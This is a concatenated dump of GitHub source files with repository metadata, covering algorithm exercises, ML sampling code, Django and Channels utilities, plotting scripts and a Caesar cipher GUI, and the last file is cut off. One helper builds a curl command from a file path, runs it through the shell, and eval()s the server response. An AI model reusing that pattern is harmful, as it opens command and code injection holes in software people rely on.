int(1e9)\nn, k = map(int, input().split())\nary = []\n\nfor _ in range(n):\n ary.append(int(input()))\n\ndp = [0] * (k + 1)\ndp[0] = 1\nfor i in range(len(ary)):\n for j in range(ary[i], k + 1):\n dp[j] += dp[j - ary[i]] \n\nprint(dp[-1])","repo_name":"kkw2758/Algorithm","sub_path":"DP/baek_2293.py","file_name":"baek_2293.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70793282361","text":"from typing import List\nfrom typing import Optional\nfrom typing import Union\n\nimport torch\nfrom tqdm import tqdm\n\nimport hmc\nimport utils\n\n\n@torch.no_grad()\ndef ais_trajectory(\n model,\n loader,\n forward: bool,\n schedule: Union[torch.Tensor, List],\n n_sample: Optional[int] = 100,\n initial_step_size: Optional[int] = 0.01,\n device: Optional[torch.device] = None,\n):\n \"\"\"Compute annealed importance sampling trajectories for a batch of data.\n\n Could be used for *both* forward and reverse chain in BDMC.\n\n Args:\n model (vae.VAE): VAE model\n loader (iterator): iterator that returns pairs, with first component\n being `x`, second would be `z` or label (will not be used)\n forward: indicate forward/backward chain\n schedule: temperature schedule, i.e. `p(z)p(x|z)^t`\n n_sample: number of importance samples\n device: device to run all computation on\n initial_step_size: initial step size for leap-frog integration;\n the actual step size is adapted online based on accept-reject ratios\n\n Returns:\n a list where each element is a torch.Tensor that contains the\n log importance weights for a single batch of data\n \"\"\"\n\n def log_f_i(z, data, t, log_likelihood_fn=utils.log_bernoulli):\n \"\"\"Unnormalized density for intermediate distribution `f_i`:\n f_i = p(z)^(1-t) p(x,z)^(t) = p(z) p(x|z)^t\n => log f_i = log p(z) + t * log p(x|z)\n \"\"\"\n zeros = torch.zeros_like(z)\n log_prior = utils.log_normal(z, zeros, zeros)\n log_likelihood = log_likelihood_fn(model.decode(z), data)\n\n return log_prior + log_likelihood.mul_(t)\n\n logws = []\n for i, (batch, post_z) in enumerate(loader):\n B = batch.size(0) * n_sample\n batch = batch.to(device)\n batch = utils.safe_repeat(batch, n_sample)\n\n epsilon = torch.full(size=(B,), device=device, fill_value=initial_step_size)\n accept_hist = torch.zeros(size=(B,), device=device)\n logw = torch.zeros(size=(B,), device=device)\n\n # initial sample of z\n if forward:\n current_z = torch.randn(size=(B, model.latent_dim), device=device)\n else:\n current_z = utils.safe_repeat(post_z, n_sample).to(device)\n\n for j, (t0, t1) in tqdm(enumerate(zip(schedule[:-1], schedule[1:]), 1)):\n # update log importance weight\n log_int_1 = log_f_i(current_z, batch, t0)\n log_int_2 = log_f_i(current_z, batch, t1)\n logw += log_int_2 - log_int_1\n\n def U(z):\n return -log_f_i(z, batch, t1)\n\n @torch.enable_grad()\n def grad_U(z):\n z = z.clone().requires_grad_(True)\n grad, = torch.autograd.grad(U(z).sum(), z)\n max_ = B * model.latent_dim * 100.\n grad = torch.clamp(grad, -max_, max_)\n return grad\n\n def normalized_kinetic(v):\n zeros = torch.zeros_like(v)\n return -utils.log_normal(v, zeros, zeros)\n\n # resample velocity\n current_v = torch.randn_like(current_z)\n z, v = hmc.hmc_trajectory(current_z, current_v, grad_U, epsilon)\n current_z, epsilon, accept_hist = hmc.accept_reject(\n current_z,\n current_v,\n z,\n v,\n epsilon,\n accept_hist,\n j,\n U=U,\n K=normalized_kinetic,\n )\n\n logw = utils.logmeanexp(logw.view(n_sample, -1).transpose(0, 1))\n if not forward:\n logw = -logw\n logws.append(logw)\n print('Last batch stats %.4f' % (logw.mean().cpu().item()))\n\n return logws\n","repo_name":"lxuechen/BDMC","sub_path":"ais.py","file_name":"ais.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"40"} +{"seq_id":"19434067327","text":"from unittest import TestCase\nfrom relative_ranks import Solution\n\n\nclass TestSolution(TestCase):\n def test_find_relative_ranks(self):\n s = Solution()\n data = [10, 3, 8, 9, 4]\n x = s.findRelativeRanks(data)\n self.assertEqual(['Gold Medal', '5', 'Bronze Medal', 'Silver Medal', '4'], x)\n","repo_name":"plocinskipiotr/my_leetcode","sub_path":"problems/easy/relative_ranks/test_relative_ranks.py","file_name":"test_relative_ranks.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10509123540","text":"# p.339\n# 2021-08-17\n# https://www.acmicpc.net/problem/18352\n\n# 입력\n# 4 4 2 1\n# 1 2\n# 1 3\n# 2 3\n# 2 4\n\nfrom collections import deque\n\nn, m, k, x = map(int, input().split())\ngraph = [[] for _ in range(n+1)]\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\nvisited = [-1] * (n+1)\ndef bfs(graph, start, visited, k):\n # 큐(Queue) 구현을 위해 deque 라이브러리 사용\n queue = deque([start])\n # 현재 노드를 방문 처리\n visited[start] = 0\n # 큐가 빌 때까지 반복\n while queue:\n # 큐에서 하나의 원소를 뽑아 출력\n v = queue.popleft()\n for i in graph[v]:\n if visited[i] == -1:\n visited[i] = visited[v] + 1\n queue.append(i)\n result = 0\n\n for i in range(1, n+1):\n if k == visited[i]:\n print(i)\n result += 1\n if result == 0:\n print(-1)\n\nbfs(graph, x, visited, k)","repo_name":"yunyezl/algoitzman","sub_path":"cheongha/DFS&BFS/특정거리의도시찾기.py","file_name":"특정거리의도시찾기.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"ko","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"15607531499","text":"import subprocess\n\n\ndef classify(image_path: str) -> dict:\n # curl -X POST -F image=@now.jpg 'http://localhost:5000/predict_3level'\n api_url = \"http://localhost:5000/predict\"\n command_format = \"curl -X POST -F 'image=@{}' '{}'\"\n p = command_format.format(image_path, api_url)\n result = subprocess.check_output(p, shell=True)\n text = result.decode('utf-8')\n text = text.replace('true', 'True')\n text = text.replace('false', 'False')\n result_dict = eval(text)\n return result_dict\n","repo_name":"OheyaObeya/OheyaObeyaGUIDemo","sub_path":"scripts/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36639858859","text":"import os\nfrom io import StringIO\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.core.management import call_command\n\n\nclass Command(BaseCommand):\n help = 'create a bunch of json file out of dumpdata in the desired order'\n TABLES = [\n 'auth.group',\n 'auth.user',\n 'impresso.profile',\n 'impresso.collection',\n 'impresso.collectableItem'\n ]\n\n def prompt_env(self, default=\"yes\"):\n dotenv_filename = '.{0}.env'.format(os.environ.get('ENV', '')) if 'ENV' in os.environ else '.env'\n self.stdout.write('syncing data using env file: {0}'.format(dotenv_filename))\n question = 'Continue using this env file? Type \"y\" to continue... '\n\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n self.stdout.write(question + prompt)\n choice = input().lower().strip()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n self.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")\n\n def create_fixture(self, app_name, filename):\n buf = StringIO()\n self.stdout.write('create fixture for app: %s in %s' % (app_name, filename))\n call_command('dumpdata', app_name, stdout=buf)\n buf.seek(0)\n with open(filename, 'w') as f:\n f.write(buf.read())\n\n def handle(self, *args, **options):\n self.prompt_env()\n\n for t in Command.TABLES:\n self.stdout.write('dumping table: %s' % t)\n self.create_fixture(t, '{0}.json'.format(t))\n","repo_name":"impresso/impresso-user-admin","sub_path":"impresso/management/commands/customdumpdata.py","file_name":"customdumpdata.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32066549357","text":"from . import views\r\nfrom django.urls import path\r\n\r\nurlpatterns = [\r\n path('',views.home,name='home'),\r\n path('register/',views.register,name='register'),\r\n path('login/',views.login,name='login'),\r\n path('info/',views.info,name='info'),\r\n path('logout/',views.logout,name='logout'),\r\n path('contact/',views.contact,name='contact'),\r\n path('generate/',views.generate,name='generate')\r\n]","repo_name":"truptipatil04/MP1-TimeTableGenerator","sub_path":"TimeTableGenerator/TimeTableGenerator/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38481739435","text":"''' Write a Python program to get a list, sorted in increasing order by the last element in each tuple from a given list of non-empty tuples. Go to the editor\nSample List : [(2, 5), (1, 2), (4, 4), (2, 3), (2, 1)]\nExpected Result : [(2, 1), (1, 2), (2, 3), (4, 4), (2, 5)]'''\n\na=[]\nt=[]\nl=int(input(\"How many pairs\"))\nfor i in range(l):\n\ta.append([])\n\tfor j in range(2):\n\t\tele=int(input())\n\t\ta[i].append(j)\n\t\t\n\nprint(a)","repo_name":"Sasikumar-s/Python-files","sub_path":"List/6-sorted in increasing order by the last element in each tuple from a given list of non-empty tuples.py","file_name":"6-sorted in increasing order by the last element in each tuple from a given list of non-empty tuples.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"41353421966","text":"from typing import NamedTuple, List, Dict\nfrom utils import lido, log\nfrom utils.config import prompt_bool\nfrom utils.evm_script import encode_call_script\n\nfrom brownie import (Contract, EasyTrack)\n\nclass FactoryToAdd(NamedTuple):\n factory: Contract\n permissions: str\n\nclass FactoryToRemove(NamedTuple):\n factory: Contract\n\ndef create_voting_on_new_factories(\n easy_track: EasyTrack,\n factories_to_add: List[FactoryToAdd],\n factories_to_remove: List[FactoryToRemove],\n network: str,\n tx_params: Dict[str, str]\n) -> int:\n factories_evm_script: str = encode_call_script(\n [\n (\n easy_track.address,\n easy_track.removeEVMScriptFactory.encode_input(\n elem.factory\n )\n )\n for elem in factories_to_remove\n ] +\n [\n (\n easy_track.address,\n easy_track.addEVMScriptFactory.encode_input(\n elem.factory,\n elem.permissions\n )\n )\n for elem in factories_to_add\n ]\n )\n\n description: str = 'Omnibus vote:'\n item_id: int = 1\n for elem in factories_to_remove:\n description += f'{item_id}) Remove {elem.factory} factory;'\n item_id = item_id + 1\n\n for elem in factories_to_add:\n description += f'{item_id}) Add {elem.factory} factory;'\n item_id = item_id + 1\n description = description[:-1] + '.'\n\n print(description.replace(';', '\\n'))\n\n print(\"Proceed to create vote? [yes/no]: \")\n\n if not prompt_bool():\n log.nb(\"Aborting\")\n return -1\n\n vote_id, _ = lido.create_voting(\n evm_script=factories_evm_script,\n description=description,\n network=network,\n tx_params=tx_params,\n )\n return vote_id\n","repo_name":"lidofinance/easy-track","sub_path":"utils/vote_for_new_factories.py","file_name":"vote_for_new_factories.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"26621720424","text":"from urllib.parse import urlparse\n\nfrom django.conf import settings\nfrom django.http.request import validate_host\n\nfrom ..generic.websocket import AsyncWebsocketConsumer\n\n\nclass OriginValidator:\n \"\"\"\n Validates that the incoming connection has an Origin header that\n is in an allowed list.\n \"\"\"\n\n def __init__(self, application, allowed_origins):\n self.application = application\n self.allowed_origins = allowed_origins\n\n def __call__(self, scope):\n # Make sure the scope is of type websocket\n if scope[\"type\"] != \"websocket\":\n raise ValueError(\"You cannot use OriginValidator on a non-WebSocket connection\")\n # Extract the Origin header\n origin_host = None\n for header_name, header_value in scope.get(\"headers\", []):\n if header_name == b\"origin\":\n print(\"got origin header, val %r\" % header_value)\n try:\n origin_host = urlparse(header_value.decode(\"ascii\")).hostname\n print(\"nuhost: %r\" % origin_host)\n except UnicodeDecodeError:\n pass\n else:\n print(\"non origin header: %r\" % header_name)\n # Check to see if the origin header is valid\n print(\"origin header: %s\" % origin_host)\n if self.valid_origin(origin_host):\n # Pass control to the application\n return self.application(scope)\n else:\n # Deny the connection\n return WebsocketDenier(scope)\n\n def valid_origin(self, origin):\n # None is not allowed\n if origin is None:\n return False\n # Check against our list\n return validate_host(origin, self.allowed_origins)\n\n\ndef AllowedHostsOriginValidator(application):\n \"\"\"\n Factory function which returns an OriginValidator configured to use\n settings.ALLOWED_HOSTS.\n \"\"\"\n allowed_hosts = settings.ALLOWED_HOSTS\n if settings.DEBUG and not allowed_hosts:\n allowed_hosts = [\"localhost\", \"127.0.0.1\", \"[::1]\"]\n return OriginValidator(application, allowed_hosts)\n\n\nclass WebsocketDenier(AsyncWebsocketConsumer):\n \"\"\"\n Simple application which denies all requests to it.\n \"\"\"\n\n async def connect(self):\n await self.close()\n","repo_name":"ianbrown112/django-channels","sub_path":"venv/lib/python3.5/site-packages/channels/security/websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21693019028","text":"def solution(cookie):\n if len(cookie) == 1:\n return 0\n if len(cookie) == 2:\n if cookie[0] != cookie[1]:\n return 0\n else:\n return cookie[1]\n\n coosum = [0] * len(cookie)\n coosum[0] = cookie[0]\n for i in range(1, len(cookie)):\n coosum[i] += coosum[i-1] + cookie[i]\n \n answer = -1\n maxcookie = coosum[-1] //2 if coosum[-1] %2 == 0 else (coosum[-1]-1)//2\n for l in range(len(cookie)):\n for r in range(l+1, len(cookie)):\n # 토탈이 짝수이면 바구니 단위로 똑같이 나눌 수 있는지 봐야함\n total = coosum[r] - coosum[l] + cookie[l]\n if total % 2 == 1:\n continue\n\n for i in range(r-1, l-1, -1):\n if coosum[r] - coosum[i] > total //2:\n break\n if (coosum[r] - coosum[i]) == total//2:\n answer = max(answer, total//2)\n if maxcookie == answer:\n return answer\n break\n \n if answer == -1:\n return 0\n else: return answer \n","repo_name":"thing-zoo/algorithm-study","sub_path":"PGS/seeun/연습문제/쿠키 구입.py","file_name":"쿠키 구입.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30346714065","text":"\"\"\"\nhttps://leetcode.com/problems/longest-common-prefix/\n\"\"\"\n\nclass Solution(object):\n def longestCommonPrefix(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n longest_prefix=\"\"\n\n \n # base case\n if strs is None or len(strs) == 0:\n return longest_prefix\n \n if len(strs) == 1:\n return strs[0]\n \n \n first_word = strs[0]\n \n for i in range(0, len(first_word) + 1):\n prefix = first_word[0:i]\n should_update_longest = True\n \n for other_word in strs[1:]:\n if other_word[0:i] != prefix:\n should_update_longest= False\n break\n \n if should_update_longest == True:\n longest_prefix = prefix\n else:\n break\n \n return longest_prefix","repo_name":"trung1704ptit/LeetCode","sub_path":"Prefix/14-longest-common-prefix.py","file_name":"14-longest-common-prefix.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18038796606","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv('OECD_Health_systems.csv')\ndf = df[['Country_Region', 'Health_exp_per_capita_USD_2016', 'Health_exp_pct_GDP_2016']].dropna()\ndf = df.sort_values('Health_exp_per_capita_USD_2016', ascending=True)\n\nx = df['Health_exp_per_capita_USD_2016']\ny = df['Country_Region']\nz = df['Health_exp_pct_GDP_2016']\nfont = {'fontname': 'Arial Rounded MT Bold', 'color': '#326479'}\ncolors = [\n \"#ff3662\",\n \"#ff747c\",\n \"#6a0004\",\n \"#a3000a\",\n \"#d9690d\",\n \"#441814\",\n \"#ffb4a1\",\n \"#5b372b\",\n \"#934700\",\n \"#ff9f57\",\n \"#633c00\",\n \"#ebc147\",\n \"#d8bf00\",\n \"#c9ce1e\",\n \"#405a00\",\n \"#bccc97\",\n \"#59e131\",\n \"#007e2c\",\n \"#01d766\",\n \"#72db92\",\n \"#006b57\",\n \"#00ac9a\",\n \"#018eae\",\n \"#94ceed\",\n \"#00436b\",\n \"#80bdff\",\n \"#739fff\",\n \"#0050a1\",\n \"#0250d4\",\n \"#000d93\",\n \"#9969ff\",\n \"#d1abff\",\n \"#7300be\",\n \"#880071\",\n \"#ff25ce\",\n \"#ff81c5\",\n \"#ce0085\"]\n\nfig, ax = plt.subplots(figsize=(16, 9))\n\nplt.barh(y, x, color=colors, alpha=0.8)\nfor i, (v1, v2) in enumerate(zip(x, z)):\n plt.text(v1 + 25, i, f'{v1:,.0f} ({v2}%)', va='center', alpha=0.9, **font)\n\nax.set_facecolor('#daedf4')\nax.set_xticklabels([f'{int(x):,}' for x in ax.get_xticks().tolist()])\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\nax.tick_params(axis='y', left=False, pad=0)\n\nplt.title('Healthcare Expenditures by OECD Countries in 2016', **font, fontsize=20)\nplt.xlabel('Expenditures per Capita in USD (% of GDP in Parentheses)', **font, fontsize=15)\nplt.xticks(**font, fontsize=12)\nplt.yticks(**font, fontsize=12)\nplt.margins(x=0.08, y=0.01)\nplt.tight_layout()\nplt.savefig('Healthcare_Expenditures_by_OECD_Countries_graph.png', ppi=300)\nplt.show()\n","repo_name":"henryli-git/Data_Visualization","sub_path":"Healthcare_Expenditures/Healthcare_Expenditures_by_OECD_Countries.py","file_name":"Healthcare_Expenditures_by_OECD_Countries.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"37129433482","text":"import sys\nfrom tkinter import *\n\nalfabeto=\" a b c d e f g h i j k l m n ñ o p q r s t u v w x y z á é í ó ú\"\nnumeros=\" 0 1 2 3 4 5 6 7 8 9\"\nalfabeto=alfabeto+alfabeto.upper()+numeros\nalfabeto=alfabeto.split()\ntam=len(alfabeto)\nencrip=\"\"\ndic={}\ny=0\nresultado=\"\"\nfor x in alfabeto:\n dic[y]=x\n dic[x]=y\n y=y+1\nd=0\n\ndef Desencriptar():\n T2.delete(1.0, END) \n try:\n d = int(desplazamiento.get())\n y = T1.get(1.0, END)\n resultado=\"\"\n for x in y:\n if x in dic:\n resultado=resultado+dic[(dic[x]-d)%tam]\n else:\n resultado=resultado+x\n etiqueta2.config(text=\"Texto desencriptado\")\n T2.insert(END, resultado)\n except ValueError:\n resultado=\"\"\n T2.delete(1.0, END)\n\ndef Encriptar():\n T2.delete(1.0, END)\n try:\n d = int(desplazamiento.get())\n y = T1.get(1.0, END)\n resultado=\"\"\n for x in y:\n if x in dic:\n resultado=resultado+dic[(dic[x]+d)%tam]\n else:\n resultado=resultado+x\n etiqueta2.config(text=\"Texto encriptado\")\n T2.insert(END, resultado)\n except ValueError:\n resultado=\"\"\n T2.delete(1.0, END)\n\napp = Tk()\napp.title(\"Cifrado César\")\n\nvp = Frame(app, relief=\"raised\")\nvp.grid(column=0, row=0, padx=(25,25), pady=(10,10), sticky=(N, S, E, W))\nvp.columnconfigure(0, weight=3)\nvp.rowconfigure(0, weight=1)\n \nscrollbar = Scrollbar(vp) \n\netiqueta1 = Label(vp, text=\"Ingresar texto\")\netiqueta1.grid(column=1, row=1, columnspan=3, sticky=(N,S,E,W)) \n\nT1 = Text(vp, height=10, width=30)\nT1.config(bd=5, yscrollcommand=scrollbar)\nT1.grid(column=1, row=2, columnspan=3, sticky=(E, W))\nT1.columnconfigure(0, weight=3)\nT1.rowconfigure(0, weight=1)\n\netiqueta2 = Label(vp, text=\"Resultado\")\netiqueta2.grid(column=1, row=3, columnspan=3, sticky=(N,S,E,W))\n\nT2 = Text(vp, height=10, width=30)\nT2.config(bd=5, yscrollcommand=scrollbar)\nT2.grid(column=1, row=4, columnspan=3, sticky=(E, W))\nT2.columnconfigure(0, weight=3)\nT2.rowconfigure(0, weight=1)\n\nboton1 = Button(vp, text=\"Encriptar\", command=Encriptar)\nboton1.grid(column=1, row=5)\n \nboton2 = Button(vp, text=\"Desencriptar\", command=Desencriptar)\nboton2.grid(column=2, row=5)\n\ndesplazamiento = Entry(vp,width=10, textvariable=d)\ndesplazamiento.grid(column=3, row=5)\ndesplazamiento.columnconfigure(0, weight=1)\ndesplazamiento.rowconfigure(0, weight=1)\n\napp.mainloop()\n","repo_name":"roggervalf/Python","sub_path":"Cesar.py","file_name":"Cesar.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17433592264","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam, lr_scheduler\n\n# from unet import UNet\nfrom swin_unet import UNet_emb #UNet\nfrom utils import *\nimport torchvision\nimport os\nimport json\n\n\nclass dehamer(object):\n \"\"\"Implementation of dehamer from Guo et al. (2022).\"\"\"\n\n def __init__(self, params, trainable):\n \"\"\"Initializes model.\"\"\"\n self.p = params\n self.trainable = trainable\n self._compile()\n\n\n def _compile(self):\n\n self.model = UNet_emb()\n\n # Set optimizer and loss, if in training mode\n if self.trainable:\n self.optim = Adam(self.model.parameters(),\n lr=self.p.learning_rate,\n betas=self.p.adam[:2],\n eps=self.p.adam[2])\n\n # Learning rate adjustment\n self.scheduler = lr_scheduler.ReduceLROnPlateau(self.optim,\n patience=self.p.nb_epochs/4, factor=0.5, verbose=True)\n\n # Loss function\n if self.p.loss == 'l2':\n self.loss = nn.MSELoss()\n else:\n self.loss = nn.L1Loss()\n\n # CUDA support\n self.use_cuda = torch.cuda.is_available() and self.p.cuda\n if self.use_cuda:\n self.model = self.model.cuda()\n if self.trainable:\n self.loss = self.loss.cuda()\n self.model = torch.nn.DataParallel(self.model)\n\n\n def _print_params(self):\n \"\"\"Formats parameters to print when training.\"\"\"\n\n print('Training parameters: ')\n self.p.cuda = self.use_cuda\n param_dict = vars(self.p)\n pretty = lambda x: x.replace('_', ' ').capitalize()\n print('\\n'.join(' {} = {}'.format(pretty(k), str(v)) for k, v in param_dict.items()))\n print()\n\n\n def save_model(self, epoch, stats, first=False):\n \"\"\"Saves model to files; can be overwritten at every epoch to save disk space.\"\"\"\n\n # Create directory for model checkpoints, if nonexistent\n if first:\n ckpt_dir_name = f'{datetime.now():{self.p.dataset_name}-%m%d-%H%M}'\n if self.p.ckpt_overwrite:\n ckpt_dir_name = self.p.dataset_name\n\n self.ckpt_dir = os.path.join(self.p.ckpt_save_path, ckpt_dir_name)\n if not os.path.isdir(self.p.ckpt_save_path):\n os.mkdir(self.p.ckpt_save_path)\n if not os.path.isdir(self.ckpt_dir):\n os.mkdir(self.ckpt_dir)\n\n # Save checkpoint dictionary\n if self.p.ckpt_overwrite:\n fname_unet = '{}/dehamer-{}.pt'.format(self.ckpt_dir, self.p.dataset_name)\n else:\n valid_loss = stats['valid_loss'][epoch]\n fname_unet = '{}/dehamer-epoch{}-{:>1.5f}.pt'.format(self.ckpt_dir, epoch + 1, valid_loss)\n print('Saving checkpoint to: {}\\n'.format(fname_unet))\n torch.save(self.model.state_dict(), fname_unet)\n\n # Save stats to JSON\n fname_dict = '{}/dehamer-stats.json'.format(self.ckpt_dir)\n with open(fname_dict, 'w') as fp:\n json.dump(stats, fp, indent=2)\n\n\n def load_model(self, ckpt_fname):\n \"\"\"Loads model from checkpoint file.\"\"\"\n\n print('Loading checkpoint from: {}'.format(ckpt_fname))\n if self.use_cuda:\n self.model.load_state_dict(torch.load(ckpt_fname))\n else:\n self.model.load_state_dict(torch.load(ckpt_fname, map_location='cpu'))\n\n\n def _on_epoch_end(self, stats, train_loss, epoch, epoch_start, valid_loader):\n \"\"\"Tracks and saves starts after each epoch.\"\"\"\n # import pdb;pdb.set_trace()\n # Evaluate model on validation set\n print('\\rTesting model on validation set... ', end='')\n epoch_time = time_elapsed_since(epoch_start)[0]\n valid_loss, valid_time, valid_psnr = self.eval(valid_loader)\n show_on_epoch_end(epoch_time, valid_time, valid_loss, valid_psnr)\n\n # Decrease learning rate if plateau\n self.scheduler.step(valid_loss)\n\n # Save checkpoint\n stats['train_loss'].append(train_loss)\n stats['valid_loss'].append(valid_loss)\n stats['valid_psnr'].append(valid_psnr)\n self.save_model(epoch, stats, epoch == 0)\n\n # Plot stats\n if self.p.plot_stats:\n loss_str = f'{self.p.loss.upper()} loss'\n plot_per_epoch(self.ckpt_dir, 'Valid loss', stats['valid_loss'], loss_str)\n plot_per_epoch(self.ckpt_dir, 'Valid PSNR', stats['valid_psnr'], 'PSNR (dB)')\n\n\n\n def eval(self, valid_loader):\n with torch.no_grad():\n self.model.train(False)\n\n valid_start = datetime.now()\n loss_meter = AvgMeter()\n psnr_meter = AvgMeter()\n\n for batch_idx, (source, target,haze_name) in enumerate(valid_loader):\n if self.use_cuda:\n source = source.cuda()\n target = target.cuda()\n\n # dehaze\n source_dehazed = self.model(source)\n\n # Update loss\n loss = self.loss(source_dehazed, target)\n loss_meter.update(loss.item())\n\n # Compute PSRN\n for i in range(source_dehazed.shape[0]):\n # import pdb;pdb.set_trace()\n source_dehazed = source_dehazed.cpu()\n target = target.cpu()\n psnr_meter.update(psnr(source_dehazed[i], target[i]).item())\n\n valid_loss = loss_meter.avg\n valid_time = time_elapsed_since(valid_start)[0] \n psnr_avg = psnr_meter.avg\n\n return valid_loss, valid_time, psnr_avg \n \n\n def train(self, train_loader, valid_loader): \n \"\"\"Trains denoiser on training set.\"\"\" \n \n self.model.train(True)\n \n if self.p.ckpt_load_path is not None:\n self.model.load_state_dict(torch.load(self.p.ckpt_load_path), strict=False)\n print('The pretrain model is loaded.')\n self._print_params()\n num_batches = len(train_loader)\n assert num_batches % self.p.report_interval == 0, 'Report interval must divide total number of batches'\n\n # Dictionaries of tracked stats\n stats = {'dataset_name': self.p.dataset_name, \n 'train_loss': [],\n 'valid_loss': [], \n 'valid_psnr': []} \n \n # Main training loop \n train_start = datetime.now()\n for epoch in range(self.p.nb_epochs): \n print('EPOCH {:d} / {:d}'.format(epoch + 1, self.p.nb_epochs))\n\n # Some stats trackers\n epoch_start = datetime.now()\n train_loss_meter = AvgMeter()\n loss_meter = AvgMeter()\n time_meter = AvgMeter()\n\n # Minibatch SGD\n for batch_idx, (source, target) in enumerate(train_loader):\n batch_start = datetime.now()\n progress_bar(batch_idx, num_batches, self.p.report_interval, loss_meter.val)\n\n \n if self.use_cuda:\n source = source.cuda()\n target = target.cuda()\n\n # Denoise image\n source_dehazed = self.model(source)\n\n loss = self.loss(source_dehazed, target)\n loss_meter.update(loss.item())\n\n # Zero gradients, perform a backward pass, and update the weights\n self.optim.zero_grad()\n loss.backward()\n self.optim.step()\n \n # Report/update statistics\n time_meter.update(time_elapsed_since(batch_start)[1])\n if (batch_idx + 1) % self.p.report_interval == 0 and batch_idx:\n show_on_report(batch_idx, num_batches, loss_meter.avg, time_meter.avg)\n train_loss_meter.update(loss_meter.avg)\n loss_meter.reset()\n time_meter.reset()\n\n # Epoch end, save and reset tracker\n self._on_epoch_end(stats, train_loss_meter.avg, epoch, epoch_start, valid_loader)\n train_loss_meter.reset()\n\n train_elapsed = time_elapsed_since(train_start)[0]\n print('Training done! Total elapsed time: {}\\n'.format(train_elapsed))\n\n\n\n\n","repo_name":"Li-Chongyi/Dehamer","sub_path":"src/dehamer_model.py","file_name":"dehamer_model.py","file_ext":"py","file_size_in_byte":8321,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"40"} +{"seq_id":"3815386564","text":"from tkinter import filedialog\n\nclass FileDialogHelper:\n @staticmethod\n def select_image_folder(entry):\n folder_selected = filedialog.askdirectory()\n entry.set(folder_selected)\n\n @staticmethod\n def select_excel_path(entry):\n file_selected = filedialog.asksaveasfilename(\n defaultextension=\".xlsx\",\n filetypes=[(\"Excel files\", \"*.xlsx\")]\n )\n entry.set(file_selected)\n\n @staticmethod\n def select_output_folder(entry):\n folder_selected = filedialog.askdirectory()\n entry.set(folder_selected)\n","repo_name":"andrescarcia/OCR_MT2005","sub_path":"filedialog_helper.py","file_name":"filedialog_helper.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"17391617508","text":"from math import factorial as fact\n\nt = int(input())\n\nfor test in range(0,t):\n n = int(input())\n x = fact(n);\n sum = 0;\n while x:\n sum = sum+ (x%10)\n x = x//10\n print(sum)\n","repo_name":"Alberto-SC/Competitive-Programming-solutions","sub_path":"hackerrank/Project euler/20.Factorial_digit_sum.py","file_name":"20.Factorial_digit_sum.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24195421055","text":"from copy import deepcopy\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport torch.nn.init as init\nfrom weight_init import weight_init_\n\n# def einsum(x, A):\n# return torch.einsum(\"nctkv,kvw->nctw\", [x, A])\n\ndef einsum(x : torch.Tensor, A : torch.Tensor):\n \"\"\"paddle.einsum will be implemented in release/2.2.\n \"\"\"\n # x = x.transpose((0, 2, 3, 1, 4))\n x = x.transpose(1, 2).transpose(2, 3)\n n, c, t, k, v = x.shape\n k2, v2, w = A.shape\n assert (k == k2 and v == v2), \"Args of einsum not match!\"\n x = x.reshape((n, c, t, k * v))\n A = A.reshape((k * v, w))\n y = torch.matmul(x.to(torch.float32), 